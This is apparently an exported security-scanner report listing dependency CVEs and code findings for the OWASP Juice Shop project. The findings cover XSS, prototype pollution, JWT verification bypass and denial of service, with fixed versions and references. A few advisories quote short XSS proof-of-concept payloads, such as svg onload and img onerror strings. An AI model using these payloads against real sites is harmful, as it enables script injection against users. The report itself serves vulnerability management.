+https://nvd.nist.gov/vuln/detail/CVE-2021-26539
+https://www.cve.org/CVERecord?id=CVE-2021-26539

+ + + + + + + +
+
+
+
+ Finding 191: CVE-2021-26540 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

sanitize-html: improper + validation of hostnames set by the "allowedIframeHostnames" option can +lead to bypass hostname whitelist for iframe element
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.3.2

+

Apostrophe Technologies sanitize-html before 2.3.2 does not properly +validate the hostnames set by the "allowedIframeHostnames" option when +the "allowIframeRelativeUrls" is set to true, which allows attackers to +bypass hostname whitelist for iframe element, related using an src value + that starts with "/\example.com".

+ + +
Mitigation
+

2.3.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2021-26540
+https://advisory.checkmarx.net/advisory/CX-2021-4309
+https://github.com/apostrophecms/sanitize-html/blob/main/CHANGELOG.md#232-2021-01-26
+https://github.com/apostrophecms/sanitize-html/pull/460
+https://nvd.nist.gov/vuln/detail/CVE-2021-26540
+https://www.cve.org/CVERecord?id=CVE-2021-26540

+ + + + + + + +
+
+
+
+ Finding 192: CVE-2024-21501 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 200 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

sanitize-html: Information Exposure when used on the backend
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.12.1

+

Versions of the package sanitize-html before 2.12.1 are vulnerable to + Information Exposure when used on the backend and with the style +attribute allowed, allowing enumeration of files in the system +(including project dependencies). An attacker could exploit this +vulnerability to gather details about the file system structure and +dependencies of the targeted server.

+ + +
Mitigation
+

2.12.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-21501
+https://gist.github.com/Slonser/8b4d061abe6ee1b2e10c7242987674cf
+https://github.com/apostrophecms/apostrophe/discussions/4436
+https://github.com/apostrophecms/sanitize-html
+https://github.com/apostrophecms/sanitize-html/commit/c5dbdf77fe8b836d3bf4554ea39edb45281ec0b4
+https://github.com/apostrophecms/sanitize-html/pull/650
+https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EB5JPYRCTS64EA5AMV3INHDPI6I4AW7
+https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EB5JPYRCTS64EA5AMV3INHDPI6I4AW7/
+https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P4I5X6V3LYUNBMZ5YOW4BV427TH3IK4S
+https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P4I5X6V3LYUNBMZ5YOW4BV427TH3IK4S/
+https://nvd.nist.gov/vuln/detail/CVE-2024-21501
+https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6276557
+https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-6256334
+https://www.cve.org/CVERecord?id=CVE-2024-21501

+ + + + + + + +
+
+
+
+ Finding 98: CVE-2026-33916 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

+ + +
Description
+

handlebars.js: Handlebars: Cross-Site Scripting (XSS) via prototype pollution in partial resolution
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, resolvePartial() in the Handlebars runtime resolves partial names via a plain property lookup on options.partials without guarding against prototype-chain traversal. When Object.prototype + has been polluted with a string value whose key matches a partial +reference in a template, the polluted string is used as the partial body + and rendered without HTML escaping, resulting in reflected or stored +XSS. Version 4.7.9 fixes the issue. Some workarounds are available. +Apply Object.freeze(Object.prototype) early in application +startup to prevent prototype pollution. Note: this may break other +libraries, and/or use the Handlebars runtime-only build (handlebars/runtime), which does not compile templates and reduces the attack surface.

+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33916
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2qvq-rjwj-gvw9
+https://nvd.nist.gov/vuln/detail/CVE-2021-23369
+https://nvd.nist.gov/vuln/detail/CVE-2021-23383
+https://nvd.nist.gov/vuln/detail/CVE-2026-33916
+https://www.cve.org/CVERecord?id=CVE-2026-33916

+ + + + + + + +
+
+
+
+ Finding 99: GHSA-7rx3-28cr-v5wh Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

+ + +
Description
+

Handlebars.js has a Prototype Method Access Control Gap via Missing lookupSetter Blocklist Entry
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Summary

+

The prototype method blocklist in lib/handlebars/internal/proto-access.js blocks constructor, __defineGetter__, __defineSetter__, and __lookupGetter__, but omits the symmetric __lookupSetter__. This omission is only exploitable when the non-default runtime option allowProtoMethodsByDefault: true is explicitly set — in that configuration __lookupSetter__ becomes accessible while its counterparts remain blocked, creating an inconsistent security boundary.

+

4.6.0 is the version that introduced protoAccessControl and the allowProtoMethodsByDefault runtime option.

+

Description

+

In lib/handlebars/internal/proto-access.js:

+
const methodWhiteList = Object.create(null);
+methodWhiteList['constructor']      = false;
+methodWhiteList['__defineGetter__'] = false;
+methodWhiteList['__defineSetter__'] = false;
+methodWhiteList['__lookupGetter__'] = false;
+// __lookupSetter__ intentionally blocked in CVE-2021-23383,
+// but omitted here — creating an asymmetric blocklist
+
+ +

All four legacy accessor helpers (__defineGetter__, __defineSetter__, __lookupGetter__, __lookupSetter__) were involved in the exploit chain addressed by CVE-2021-23383. Three of the four were explicitly blocked; __lookupSetter__ was left out.

+

When allowProtoMethodsByDefault: true is set, any prototype method not present in methodWhiteList is permitted by default. Because __lookupSetter__ is absent from the list, it passes the checkWhiteList check and is accessible in templates, while __lookupGetter__ (its sibling) is correctly denied.

+

Workarounds

+
    +
  • Do not set allowProtoMethodsByDefault: true. The default configuration is not affected.
    • +
  • If allowProtoMethodsByDefault must be enabled, ensure templates do not reference __lookupSetter__ through untrusted input.
    • +
+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/advisories/GHSA-765h-qjxv-5f44
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-7rx3-28cr-v5wh

+ + + + + + + +
+
+
+
+ Finding 193: NSWG-ECO-154 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + + +
Description
+

Cross Site Scripting
+Target: Node.js
+Type: node-pkg
+Fixed version: >=1.11.4

+

Sanitize-html is a library for scrubbing html input of malicious values.

+

Versions 1.11.1 and below are vulnerable to cross site scripting (XSS) in certain scenarios:

+

If allowed at least one nonTextTags, the result is a potential XSS vulnerability.
+PoC:

+
var sanitizeHtml = require('sanitize-html');
+
+var dirty = '!<textarea>&lt;/textarea&gt;<svg/onload=prompt`xs`&gt;</textarea>!';
+var clean = sanitizeHtml(dirty, {
+    allowedTags: [ 'textarea' ]
+});
+
+console.log(clean);
+
+// !<textarea></textarea><svg/onload=prompt`xs`></textarea>!
+
+ + +
Mitigation
+
+

=1.11.4

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403
+https://github.com/punkave/sanitize-html/issues/100

+ + + + + + + +
+
+
+
+ Finding 219: CVE-2025-56200 Validator 13.15.15 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
validator13.15.15
+ + + + + + + +
File Path
juice-shop/node_modules/validator/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

+ + +
Description
+

validator.js has a URL validation bypass vulnerability in its isURL function
+Target: Node.js
+Type: node-pkg
+Fixed version: 13.15.20

+

A URL validation bypass vulnerability exists in validator.js through +version 13.15.15. The isURL() function uses '://' as a delimiter to +parse protocols, while browsers use ':' as the delimiter. This parsing +difference allows attackers to bypass protocol and domain validation by +crafting URLs leading to XSS and Open Redirect attacks.

+ + +
Mitigation
+

13.15.20

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://validatorjs.com
+https://gist.github.com/junan-98/27ae092aa40e2a057d41a0f95148f666
+https://gist.github.com/junan-98/a93130505b258b9e4ec9f393e7533596
+https://github.com/validatorjs/validator.js
+https://github.com/validatorjs/validator.js/commit/cbef5088f02d36caf978f378bb845fe49bdc0809
+https://github.com/validatorjs/validator.js/issues/2600
+https://github.com/validatorjs/validator.js/pull/2608
+https://github.com/validatorjs/validator.js/releases/tag/13.15.20
+https://nvd.nist.gov/vuln/detail/CVE-2025-56200

+ + + + + + + +
+
+
+
+ Finding 103: CVE-2026-42338 Ip-Address 10.0.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
ip-address10.0.1
+ + + + + + + +
File Path
juice-shop/node_modules/ip-address/package.json
+
+
+
+ + + + + +
Description
+

ip-address has XSS in Address6 HTML-emitting methods
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.1.1

+

Summary

+

Address6.group() and Address6.link() do not HTML-escape attacker-controlled content before embedding it in the HTML strings they return, and AddressError.parseMessage (emitted by the Address6 + constructor for invalid input) can contain unescaped +attacker-controlled content in one branch. An application that (1) +passes untrusted input to Address6 and (2) renders the output of these methods, or the thrown error's parseMessage, as HTML (e.g. via innerHTML) is vulnerable to cross-site scripting. A related issue in v6.helpers.spanAll() produced malformed markup but was not exploitable; it is hardened in the same release for consistency.

+

Details

+

Four related issues were identified and fixed together:

+
    +
  1. Address6.group(): zone ID injection. The Address6 constructor stores the raw input (including any IPv6 zone ID) in this.address before zone stripping. group() then passed this.address to helpers.simpleGroup(), which wrapped each :-separated segment in a <span> element without HTML-escaping the content. A zone ID containing HTML markup was embedded verbatim.
    2. +
  2. Address6.link({ prefix, className }): attribute-value injection. link() concatenated user-supplied prefix and className into the href="…" and class="…" attributes without escaping. A caller passing untrusted content through these options could inject event handlers (e.g. onmouseover) and achieve XSS.
    3. +
  3. Address6 constructor: leading-zero IPv4 error path. The leading-zero branch in parse4in6() built AddressError.parseMessage by concatenating the raw address through String.replace(). Because parse4in6() + runs before the bad-character check, any characters in the groups +preceding the IPv4 suffix flowed into the error's HTML unescaped. +Consumers who render parseMessage as HTML (its documented purpose — it already contains <span class="parse-error"> markup) could be XSS'd by a crafted input such as <img src=x onerror=alert(1)>:10.0.01.1.
    4. +
  4. v6.helpers.spanAll(): attribute-value injection (defense in depth). spanAll() embedded each character of its input into a class="digit value-${n} …" attribute without escaping. Because split('') limits n to a single character this was not exploitable in practice, but it produced malformed markup and is fixed for consistency.
    5. +
+

Affected Versions

+

All versions up to and including 10.1.0.

+

Patched Version

+

10.1.1.

+

Impact

+

Real-world exposure is believed to be extremely limited. Analysis of +all 425 dependent npm packages as well as GitHub code search found zero +consumers of group(), link(), or spanAll(): + these HTML-emitting surfaces appear to be unused across published npm +packages and public repositories. Applications using only the +address-parsing and comparison APIs (isValid, correctForm, isInSubnet, bigInt, etc.) are not affected.

+

Consumers who do render the output of group(), link(), spanAll(), or AddressError.parseMessage as HTML against untrusted input should upgrade.

+

PoC

+
const { Address6 } = require('ip-address');
+const addr = new Address6('fe80::1%<img src=x onerror=alert(1)>');
+document.body.innerHTML = addr.group();  // fires the onerror handler in 10.1.0
+
+ +

Workarounds

+

If users cannot upgrade immediately:

+
    +
  • Do not pass untrusted input to the Address6 constructor, or
    • +
  • Never render the output of group(), link(), or spanAll(), nor the parseMessage field of any thrown AddressError, as HTML; treat these values as text only, or run them through DOMPurify before inserting into the DOM (DOMPurify's default configuration preserves the library's intended <span> wrapping while stripping any injected event handlers), or
    • +
  • Validate input with Address6.isValid() and reject anything that contains a zone identifier (a % character) or characters outside [0-9a-fA-F:/] before passing it to the constructor.
    • +
+

Lack of separate CVEs

+

Given the evidence that these methods are not used, and given that +they are all of the same construction, maintainers do not think it's +relevant or useful to create a separate CVE for each library method.

+

Credit

+

ip-address thanks @scovetta for reporting this issue.

+ + +
Mitigation
+

10.1.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/beaugunderson/ip-address
+https://github.com/beaugunderson/ip-address/security/advisories/GHSA-v2v4-37r5-5v8g

+ + + + + + + +
+
+
+
+ Finding 104: CVE-2025-64718 Js-Yaml 3.14.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
js-yaml3.14.1
+ + + + + + + +
File Path
juice-shop/node_modules/js-yaml/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

js-yaml: js-yaml prototype pollution in merge
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.1.1, 3.14.2

+

js-yaml is a JavaScript YAML parser and dumper. In js-yaml before +4.1.1 and 3.14.2, it's possible for an attacker to modify the prototype +of the result of a parsed yaml document via prototype pollution (__proto__). + All users who parse untrusted yaml documents may be impacted. The +problem is patched in js-yaml 4.1.1 and 3.14.2. Users can protect +against this kind of attack on the server by using node --disable-proto=delete or deno (in Deno, pollution protection is on by default).

+ + +
Mitigation
+

4.1.1, 3.14.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-64718
+https://github.com/advisories/GHSA-mh29-5h37-fv8m
+https://github.com/nodeca/js-yaml
+https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879
+https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266
+https://github.com/nodeca/js-yaml/issues/730#issuecomment-3549635876
+https://github.com/nodeca/js-yaml/security/advisories/GHSA-mh29-5h37-fv8m
+https://nvd.nist.gov/vuln/detail/CVE-2025-64718
+https://www.cve.org/CVERecord?id=CVE-2025-64718

+ + + + + + + +
+
+
+
+ Finding 26: generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
21
+ + + + + + + +
File Path
/src/views/dataErasureForm.hbs
+
+
+
+ + + + + +
Description
+

Result message: + Detected a unquoted template variable as an attribute. If unquoted, a +malicious actor could inject custom JavaScript handlers. To fix this, +add quotes around the template expression, like this: "{{ expr }}".

+ + + + + + + + + + + + +
References
+

https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss

+ + + + + + + +
+
+
+
+ Finding 195: CVE-2024-38355 socket.io 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
socket.io3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/socket.io/package.json
+
+
+
+ + + + + +
Description
+

socket.io: Unhandled 'error' event
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.5.1, 4.6.2

+

Socket.IO is an open source, real-time, bidirectional, event-based, +communication framework. A specially crafted Socket.IO packet can +trigger an uncaught exception on the Socket.IO server, thus killing the +Node.js process. This issue is fixed by commit 15af22fc22 which has been included in socket.io@4.6.2 (released in May 2023). The fix was backported in the 2.x branch as well with commit d30630ba10. Users are advised to upgrade. Users unable to upgrade may attach a listener for the "error" event to catch these errors.

+ + +
Mitigation
+

2.5.1, 4.6.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-38355
+https://github.com/socketio/socket.io
+https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115
+https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c
+https://github.com/socketio/socket.io/security/advisories/GHSA-25hc-qcg6-38wj
+https://nvd.nist.gov/vuln/detail/CVE-2024-38355
+https://www.cve.org/CVERecord?id=CVE-2024-38355
+https://www.vicarius.io/vsociety/posts/unhandled-exception-in-socketio-cve-2024-38355

+ + + + + + + +
+
+
+
+ Finding 22: +javascript.express.security.audit.express-check-directory- +listing.express-check-directory-listing + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 548 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
269
+ + + + + + + +
File Path
/src/server.ts
+
+
+
+ + + + + +
Description
+

Result message: + Directory listing/indexing is enabled, which may lead to disclosure of +sensitive directories and files. It is recommended to disable directory +listing unless it is a public resource. If you need directory listing, +ensure that sensitive files are inaccessible when querying the resource.

+ + + + + + + + + + + + +
References
+

https://www.npmjs.com/package/serve-index
+https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/

+ + + + + + + +
+
+
+
+ Finding 108: CVE-2022-23540 Jsonwebtoken 0.1.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 287 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.1.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L

+ + +
Description
+

jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: 9.0.0

+

In versions <=8.5.1 of jsonwebtoken library, lack of algorithm definition in the jwt.verify() function can lead to signature validation bypass due to defaulting to the none algorithm for signature verification. Users are affected if you do not specify algorithms in the jwt.verify() + function. This issue has been fixed, please update to version 9.0.0 +which removes the default support for the none algorithm in the jwt.verify() method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the none algorithm. If you need 'none' algorithm, you have to explicitly specify that in jwt.verify() options.

+ + +
Mitigation
+

9.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-23540
+https://github.com/auth0/node-jsonwebtoken
+https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3
+https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-qwph-4952-7xr6
+https://nvd.nist.gov/vuln/detail/CVE-2022-23540
+https://security.netapp.com/advisory/ntap-20240621-0007
+https://security.netapp.com/advisory/ntap-20240621-0007/
+https://www.cve.org/CVERecord?id=CVE-2022-23540

+ + + + + + + +
+
+
+
+ Finding 109: CVE-2022-23541 Jsonwebtoken 0.1.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 287 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.1.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

+ + +
Description
+

jsonwebtoken: Insecure implementation of key retrieval function could lead to Forgeable Public/Private Tokens from RSA to HMAC
+Target: Node.js
+Type: node-pkg
+Fixed version: 9.0.0

+

jsonwebtoken is an implementation of JSON Web Tokens. Versions <= 8.5.1 of jsonwebtoken library can be misconfigured so that passing a poorly implemented key retrieval function referring to the secretOrPublicKey + argument from the readme link will result in incorrect verification of +tokens. There is a possibility of using a different algorithm and key +combination in verification, other than the one that was used to sign +the tokens. Specifically, tokens signed with an asymmetric public key +could be verified with a symmetric HS256 algorithm. This can lead to +successful validation of forged tokens. If your application is +supporting usage of both symmetric key and asymmetric key in +jwt.verify() implementation with the same key retrieval function. This +issue has been patched, please update to version 9.0.0.

+ + +
Mitigation
+

9.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-23541
+https://github.com/auth0/node-jsonwebtoken
+https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3
+https://github.com/auth0/node-jsonwebtoken/releases/tag/v9.0.0
+https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959
+https://nvd.nist.gov/vuln/detail/CVE-2022-23541
+https://security.netapp.com/advisory/ntap-20240621-0007
+https://security.netapp.com/advisory/ntap-20240621-0007/
+https://www.cve.org/CVERecord?id=CVE-2022-23541

+ + + + + + + +
+
+
+
+ Finding 25: +javascript.express.security.audit.express-check-directory- +listing.express-check-directory-listing + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 548 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
281
+ + + + + + + +
File Path
/src/server.ts
+
+
+
+ + + + + +
Description
+

Result message: + Directory listing/indexing is enabled, which may lead to disclosure of +sensitive directories and files. It is recommended to disable directory +listing unless it is a public resource. If you need directory listing, +ensure that sensitive files are inaccessible when querying the resource.

+ + + + + + + + + + + + +
References
+

https://www.npmjs.com/package/serve-index
+https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/

+ + + + + + + +
+
+
+
+ Finding 197: CVE-2023-32695 socket.io-parser 4.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
socket.io-parser4.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/socket.io-parser/package.json
+
+
+
+ + + + + +
Description
+

socket.io parser is a socket.io encoder and decoder written in JavaScr ...
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.2.3, 3.4.3, 3.3.4

+

socket.io parser is a socket.io encoder and decoder written in +JavaScript complying with version 5 of socket.io-protocol. A specially +crafted Socket.IO packet can trigger an uncaught exception on the +Socket.IO server, thus killing the Node.js process. A patch has been +released in version 4.2.3.

+ + +
Mitigation
+

4.2.3, 3.4.3, 3.3.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/socketio/socket.io-parser
+https://github.com/socketio/socket.io-parser/commit/1c220ddbf45ea4b44bc8dbf6f9ae245f672ba1b9
+https://github.com/socketio/socket.io-parser/commit/2dc3c92622dad113b8676be06f23b1ed46b02ced
+https://github.com/socketio/socket.io-parser/commit/3b78117bf6ba7e99d7a5cfc1ba54d0477554a7f3
+https://github.com/socketio/socket.io-parser/commit/ee006607495eca4ec7262ad080dd3a91439a5ba4
+https://github.com/socketio/socket.io-parser/releases/tag/4.2.3
+https://github.com/socketio/socket.io-parser/security/advisories/GHSA-cqmj-92xf-r6r9
+https://nvd.nist.gov/vuln/detail/CVE-2023-32695

+ + + + + + + +
+
+
+
+ Finding 21: +javascript.lang.security.audit.unknown-value-with-script-tag.unknown- +value-with-script-tag + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
71
+ + + + + + + +
File Path
/src/routes/videoHandler.ts
+
+
+
+ + + + + +
Description
+

Result message: + Cannot determine what 'subs' is and it is used with a '<script>' +tag. This could be susceptible to cross-site scripting (XSS). Ensure +'subs' is not externally controlled, or sanitize this data.

+ + + + + + + + + + + + +
References
+

https://www.developsec.com/2017/11/09/xss-in-a-script-tag/
+https://github.com/juice-shop/juice-shop/blob/1ceb8751e986dacd3214a618c37e7411be6bc11a/routes/videoHandler.ts#L68

+ + + + + + + +
+
+
+
+ Finding 113: CVE-2022-23540 Jsonwebtoken 0.4.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
